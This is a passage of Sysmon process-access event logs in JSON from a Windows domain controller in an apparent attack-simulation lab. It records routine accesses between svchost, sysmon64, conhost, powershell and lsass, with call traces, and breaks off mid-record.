{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5051,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.737\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.737","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5052,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.737\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.737","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5053,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.737\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.737","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5054,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.737\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.737","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5055,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.737\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.737","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5056,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.737\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.737","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5057,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.737\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.737","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5058,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.737\r\nSourceProcessGUID: {41C8662E-20CF-5F25-0000-00104CF50700}\r\nSourceProcessId: 4536\r\nSourceThreadId: 4616\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20CF-5F25-0000-00105DF80700}\r\nTargetProcessId: 4720\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.737","SourceProcessGUID":"{41C8662E-20CF-5F25-0000-00104CF50700}","SourceProcessId":"4536","SourceThreadId":"4616","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20CF-5F25-0000-00105DF80700}","TargetProcessId":"4720","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5059,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.752\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 